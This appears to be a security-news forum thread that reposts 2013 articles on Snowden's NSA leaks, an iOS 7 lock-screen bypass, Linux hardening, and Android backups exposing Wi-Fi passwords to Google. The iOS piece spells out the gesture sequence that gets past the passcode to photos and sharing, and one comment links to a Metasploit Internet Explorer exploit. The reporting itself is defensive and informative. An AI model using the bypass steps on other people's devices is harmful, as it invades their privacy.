One of the lessons learned from the investigations of the 9/11 Commission was that there was insufficient sharing of intelligence information. In order to facilitate such sharing, the NSA created a file sharing area on the Agency's intranet site. NSA officials told NPR that all of the documents Snowden has leaked came from that sharing area.

"Unfortunately for us," one official said, "if you had a top secret SCI [sensitive compartmented information] clearance, you got access to that." Not only did Snowden have such access, but as a system administrator it was part of his job to search through the shared area for documents which belonged in more restrictive areas and move them. From the NPR article:

"It's kind of brilliant, if you're him," an official said. "His job was to do what he did. He wasn't a ghost. He wasn't that clever. He did his job. He was observed [moving documents], but it was his job."

It's a little more complicated than Snowden literally doing his job, although the job was the perfect cover for his activities. The article also notes that the NSA was, at the time, allowing users access to USB ports on computers which had access to the sensitive data. They have, more recently, closed off access to those ports, which Snowden likely used to copy data from NSA systems to a USB thumb drive. Incredibly, this is the same method used by Bradley Manning long ago, but the NSA didn't react to that news.
Restricting access to USB ports has been a standard feature of Windows system management for many years, and there are 3rd-party products that do this as well. The NSA has implemented other practices, including document tagging, to prevent what Snowden did. The tags will restrict access to the documents and track their usage.

It's all another example of fighting the last war. The NSA, in this way, is following the example of the TSA.

Sursa: NSA: Snowden was just doing his job | ZDNet
-
iOS 7 lock screen bypass flaw discovered, and how to fix it
Nytro posted a topic in Stiri securitate
iOS 7 lock screen bypass flaw discovered, and how to fix it

Summary: UPDATED 2: The iOS 7 lock screen can be bypassed with a series of gesture techniques, despite the passcode. While apps are blurred out, a major Camera app bug exists, which can allow photos to be edited, deleted, and shared with others while the device is still locked.

By Zack Whittaker for Zero Day | September 19, 2013

Just one day after Apple's latest mobile operating system, iOS 7, was released to the public, one user discovered a security vulnerability in the software's lock screen.

In a video posted online, Canary Islands-based soldier Jose Rodriguez detailed the flaw, which allowed him to access the multitasking view of the software without entering a passcode. With this, it's apparent which apps are open and how many notifications there are, as well as the device's home screen.

The video, replicated below, shows the sequence of presses and taps that make this exploit possible, despite being fiddly and taking many attempts. The first step is to bring up the device's Control Center and access the Clock app, then hold down the power button until you are given the on-screen prompt to shut down the device. After you hit cancel, immediately double-tapping the home button brings up the multitasking view as expected.

ZDNet confirmed this bug exists on an array of devices. In our New York newsroom, we tested iOS 7 on an iPhone 4S, an iPhone 5, and the new iPhone 5c. All devices were exploited in the same way with the lock screen bypass technique, and all devices acted in exactly the same fashion.

However, upon further examination, it's possible to access an array of photos under the Camera Roll, and thus access sharing features — including Twitter. If the Camera app is opened first (provided it is accessible from the lock screen), by exploiting the same sequence of presses, the Camera Roll opens up. From here, images can be deleted, uploaded, edited, and shared with others.
These screenshots were taken of an iPhone 4S, giving access to photos and sharing features, despite being locked with a passcode. (Image: ZDNet)

You can see in the video (below) that even though the multitasking view — which offers a much larger view than previous iOS iterations — is viewable, the contents of the apps are not visible. iOS 7 blurs the contents of the apps, meaning would-be attackers cannot see what is going on. The only exception is the home screen, which is viewable, including which apps have been installed, along with the user's wallpaper.

Despite the flaw, iOS 7 patches 80 security vulnerabilities, according to ZDNet's Larry Seltzer. But this kind of flaw, albeit minor, may not instill a vast amount of confidence in users already jarred by the new design and user interface. Rodriguez also found a bug in iOS 6.1.3, which allowed potential hackers to access an iPhone running vulnerable software by ejecting the SIM card tray.

Until Apple issues an official fix, iOS 7 users can protect themselves by simply disabling access to the Control Center on the lock screen: in Settings, go to Control Center, then swipe off the Access on Lock Screen option so that it no longer displays on the lock screen.

We put in a request for comment to Apple but did not hear back at the time of writing. An Apple spokesperson told AllThingsD, however, that the company is "aware" of the issue and will deliver a fix soon.

Updated at 4:15 p.m. ET: with additional details regarding the Camera app. Also added additional attribution to Forbes, which was mistakenly omitted from the original piece. (via Forbes)

Sursa: iOS 7 lock screen bypass flaw discovered, and how to fix it | ZDNet
Intro To Linux System Hardening And Applying It To Your Pentest System

Description: Chris Jenks (rattis) talks about hardening Linux and how you can apply that logic to your pentest system so you don't fall prey to the hack back.

For more information please visit: Security B-Sides / BSidesDetroitConversations

Sursa: Intro To Linux System Hardening And Applying It To Your Pentest System
-
What tells me more is that "Internet Explorer". Put up an IE exploit and you'll see who those guys really are. Poof: https://community.rapid7.com/community/metasploit/blog/2013/05/05/department-of-labor-ie-0day-now-available-at-metasploit
-
Google knows nearly every Wi-Fi password in the world

By Michael Horowitz, September 12, 2013 10:44 PM EDT

If an Android device (phone or tablet) has ever logged on to a particular Wi-Fi network, then Google probably knows the Wi-Fi password. Considering how many Android devices there are, it is likely that Google can access most Wi-Fi passwords worldwide.

Recently IDC reported that 187 million Android phones were shipped in the second quarter of this year. That multiplies out to 748 million phones in 2013, a figure that does not include Android tablets. Many (probably most) of these Android phones and tablets are phoning home to Google, backing up Wi-Fi passwords along with other assorted settings. And, although they have never said so directly, it is obvious that Google can read the passwords. Sounds like a James Bond movie.

Android devices have defaulted to coughing up Wi-Fi passwords since version 2.2. And, since the feature is presented as a good thing, most people wouldn't change it. I suspect that many Android users have never even seen the configuration option controlling this. After all, there are dozens and dozens of system settings to configure. And, anyone who does run across the setting cannot hope to understand the privacy implication. I certainly did not. Specifically:

In Android 2.3.4, go to Settings, then Privacy. On an HTC device, the option that gives Google your Wi-Fi password is "Back up my settings". On a Samsung device, the option is called "Back up my data". The only description is "Back up current settings and application data". No mention is made of Wi-Fi passwords.

In Android 4.2, go to Settings, then "Backup and reset". The option is called "Back up my data". The description says "Back up application data, Wi-Fi passwords, and other settings to Google servers".

Needless to say, "settings" and "application data" are vague terms.
A longer explanation of this backup feature in Android 2.3.4 can be found in the Users Guide on page 374:

"Check to back up some of your personal data to Google servers, with your Google Account. If you replace your phone, you can restore the data you've backed up, the first time you sign in with your Google Account. If you check this option, a wide variety of your personal data is backed up, including your Wi-Fi passwords, Browser bookmarks, a list of the applications you've installed, the words you've added to the dictionary used by the onscreen keyboard, and most of the settings that you configure with the Settings application. Some third-party applications may also take advantage of this feature, so you can restore your data if you reinstall an application. If you uncheck this option, you stop backing up your data to your account, and any existing backups are deleted from Google servers."

A longer explanation for Android 4.0 can be found on page 97 of the Galaxy Nexus phone Users Guide:

"If you check this option, a wide variety of your personal data is backed up automatically, including your Wi-Fi passwords, Browser bookmarks, a list of the apps you've installed from the Market app, the words you've added to the dictionary used by the onscreen keyboard, and most of your customized settings. Some third-party apps may also take advantage of this feature, so you can restore your data if you reinstall an app. If you uncheck this option, your data stops getting backed up, and any existing backups are deleted from Google servers."

Sounds great. Backing up your data/settings makes moving to a new Android device much easier. It lets Google configure your new Android device very much like your old one. What is not said is that Google can read the Wi-Fi passwords. And, if you are reading this and thinking about one Wi-Fi network, be aware that Android devices remember the passwords to every Wi-Fi network they have logged on to.
The Register writes:

"The list of Wi-Fi networks and passwords stored on a device is likely to extend far beyond a user's home, and include hotels, shops, libraries, friends' houses, offices and all manner of other places. Adding this information to the extensive maps of Wi-Fi access points built up over years by Google and others, and suddenly fandroids face a greater risk to their privacy if this data is scrutinised by outside agents."

The good news is that Android owners can opt out just by turning off the checkbox.

Update, Sept 15, 2013: Even if Google deletes every copy of your backed-up data, they may already have been compelled to share it with others. And, Google will continue to have a copy of the password until every Android device that has ever connected to the network turns off the backing up of settings/data.

The bad news is that, like any American company, Google can be compelled by agencies of the U.S. government to silently spill the beans. When it comes to Wi-Fi, the NSA, CIA and FBI may not need hackers and cryptographers. They may not need to exploit WPS or UPnP. If Android devices are offering up your secrets, WPA2 encryption and a long random password offer no protection.

I doubt that Google wants to rat out their own customers. They may simply have no choice. What large public American company would? Just yesterday, Marissa Mayer, the CEO of Yahoo, said executives faced jail if they revealed government secrets. Lavabit felt there was a choice, but it was a single-person operation.

This is not to pick on Google exclusively. After all, Dropbox can read the files you store with them. So too can Microsoft read files stored in SkyDrive. And, although the Washington Post reported back in April that Apple's iMessage encryption foils law enforcement, cryptographer Matthew Green did a simple experiment that showed that Apple can read your iMessages. In fact, Green's experiment is pretty much the same one that shows that Google can read Wi-Fi passwords.
He describes it:

"First, lose your iPhone. Now change your password using Apple's iForgot service ... Now go to an Apple store and shell out a fortune buying a new phone. If you can recover your recent iMessages onto a new iPhone -- as I was able to do in an Apple store this afternoon -- then Apple isn't protecting your iMessages with your password or with a device key. Too bad."

Similarly, a brand new Android device can connect to Wi-Fi hotspots it is seeing for the very first time. Back in June 2011, writing for TechRepublic, Donovan Colbert described stumbling across this on a new ASUS Eee PC Transformer tablet:

"I purchased the machine late last night after work. I brought it home, set it up to charge overnight, and went to bed. This morning when I woke I put it in my bag and brought it to the office with me. I set up my Google account on the device, and then realized I had no network connection ... I pulled out my Virgin Mobile Mi-Fi 2200 personal hotspot and turned it on. I searched around Honeycomb looking for the control panel to select the hotspot and enter the encryption key. To my surprise, I found that the Eee Pad had already found the Virgin hotspot, and successfully attached to it ... As I looked further into this puzzling situation, I noticed that not only was my Virgin Hotspot discovered and attached, but a list of other hotspots ... were also listed in the Eee Pad's hotspot list. The only conclusion that one can draw from this is obvious - Google is storing not only a list of what hotspots you have visited, but any private encryption keys necessary to connect to those hotspots ..."

Micah Lee, staff technologist at the EFF, CTO of the Freedom of the Press Foundation and the maintainer of HTTPS Everywhere, blogged about the same situation back in July:

"When you format an Android phone and set it up on first run, after you login to your Google account and restore your backup, it immediately connects to wifi using a saved password."
"There's no sort of password hash that your Android phone could send your router to authenticate besides the password itself. Google stores the passwords in a manner such that they can decrypt them, given only a Gmail address and password."

Shortly after Lee's blog, Ars Technica picked up on this (see Does NSA know your Wi-Fi password? Android backups may give it to them). A Google spokesperson responded to the Ars article with a prepared statement:

"Our optional 'Backup my data' feature makes it easier to switch to a new Android device by using your Google Account and password to restore some of your previous settings. This helps you avoid the hassle of setting up a new device from scratch. At any point, you can disable this feature, which will cause data to be erased. This data is encrypted in transit, accessible only when the user has an authenticated connection to Google and stored at Google data centers, which have strong protections against digital and physical attacks."

Sean Gallagher, who wrote the Ars article, added "The spokesperson could not speak to how ... the data was secured at rest." Lee responded to this with:

"... it's great the backup/restore feature is optional. It's great that if you turn it off Google will delete your data. It's great that the data is encrypted in transit between the Android device and Google's servers, so that eavesdroppers can't pull your backup data off the wire. And it's great that they have strong security, both digital and physical, at their data centers. However, Google's statement doesn't mention whether or not Google itself has access to the plaintext backup data (it does)... [The issue is] Not how easy it is for an attacker to get at this data, but how easy it is for an authorized Google employee to get at it as part of their job. This is important because if Google has access to this plaintext data, they can be compelled to give it to the US government."
Google danced around the issue of whether they can read the passwords because they don't want people like me writing blogs like this. Maybe this is why Apple, so often, says nothing.

Eventually Lee filed an official Android feature request, asking Google to offer backups that are stored in such a way that only the end user (you and I) can access the data. The request was filed about two months ago and has been ignored by Google.

I am not revealing anything new here. All this has been out in the public before. Below is a partial list of previous articles. However, this story has, on the whole, flown under the radar. Most tech outlets didn't cover it (Ars Technica and The Register being exceptions) for reasons that escape me.

1) Google knows where you've been and they might be holding your encryption keys. June 21, 2011, by Donovan Colbert for TechRepublic. This is the first article I was able to find on the subject. Colbert was not happy, writing:

"... my corporate office has a public, protected wireless access point. The idea that every Android device that connects with that access point shares our private corporate access key with Google is pretty unacceptable ... This isn't just a trivial concern. The fact that my company can easily lose control of their own proprietary WPA2 encryption keys just by allowing a user with an Android device to use our wireless network is significant. It illustrates a basic lack of understanding on the ethics of dealing with sensitive corporate and personal data on the behalf of the engineers, programmers and leadership at Google. Honestly, if there is any data that shouldn't be harvested, stored and synched automatically between devices, it is encryption keys, passcodes and passwords."

2) Storage of credentials on the company servers Google by Android smartphones (translated from German). July 8, 2013.
The University of Passau in Germany tells the university community to turn off Android backups because disclosing passwords to third parties is prohibited. They warn that submitting your password to any third party lets unauthorised people access University services under your identity. They also advise changing all passwords stored on Android devices.

3) Use Android? You're Probably Giving Google All Your Wifi Passwords. July 11, 2013, by Micah Lee. Where I first ran into this story.

4) Android and its password problems open doors for spies. July 16, 2013, by The H Security in Germany. Excerpt:

"Tests ... at heise Security showed that after resetting an Android phone to factory settings and then synchronising with a Google account, the device was immediately able to connect to a heise test network secured using WPA2. Anyone with access to a Google account therefore has access to its Wi-Fi passwords. Given that Google maintains a database of Wi-Fi networks throughout the world for positioning purposes, this is a cause for concern in itself, as the backup means that it also has the passwords for these networks. In view of Google's generosity in sharing data with the NSA, this now looks even more troubling ... European companies are unlikely to be keen on the idea of this backup service, activated by default, allowing US secret services to access their networks with little effort."

5) Does NSA know your Wi-Fi password? Android backups may give it to them. July 17, 2013, by Sean Gallagher for Ars Technica. This is the article referred to earlier. After this one story, Ars dropped the issue, which I find strange since they must have realized the implications.

6) Android backup sends unencrypted Wi-Fi passwords to Google. July 18, 2013, by Zeljka Zorz for net-security.org.

7) Would you tell Google your Wi-Fi password? You probably already did... July 18, 2013, by Paul Ducklin writing for the Sophos Naked Security blog. Ducklin writes ...
"... the data is encrypted in transit, and Google (for all we know) probably stores it encrypted at the other end. But it's not encrypted in the sense of being inaccessible to anyone except you ... Google can unilaterally recover the plaintext of your Wi-Fi passwords, precisely so it can return those passwords to you quickly and conveniently ..."

8) Android Backups Could Expose Wi-Fi Passwords to NSA. July 19, 2013, by Ben Weitzenkorn of TechNewsDaily. This same story also appeared at nbcnews.com and mashable.com.

9) Despite Google's statement, they still have access to your wifi passwords. July 19, 2013, by Micah Lee on his personal blog. Lee rebuts the Google spokesperson's response to the Ars Technica article.

10) Oi, Google, you ate all our Wi-Fi keys - don't let the spooks gobble them too. July 23, 2013, by John Leyden for The Register. Leyden writes: "Privacy experts have urged Google to allow Android users' to encrypt their backups in the wake of the NSA PRISM surveillance flap."

11) Google: Keep Android Users' Secure Network Passwords Secure. August 5, 2013, by Micah Lee and David Grant of the EFF. They write:

"Fixing the flaw is more complicated than it might seem. Android is an open source operating system developed by Google. Android Backup Service is a proprietary service offered by Google, which runs on Android. Anyone can write new code for Android, but only Google can change the Android Backup Service."

To conclude on a Defensive Computing note, those that need Wi-Fi at home should consider using a router offering a guest network. Make sure that Android devices accessing the private network are not backing up settings to Google. This is not realistic for the guest network, but you can enable the guest network only when needed and then shut it down afterwards. Also, you can periodically change the password of the guest network without impacting your personal wireless devices. At this point, everybody should probably change their Wi-Fi password.
Sursa: Google knows nearly every Wi-Fi password in the world | Computerworld Blogs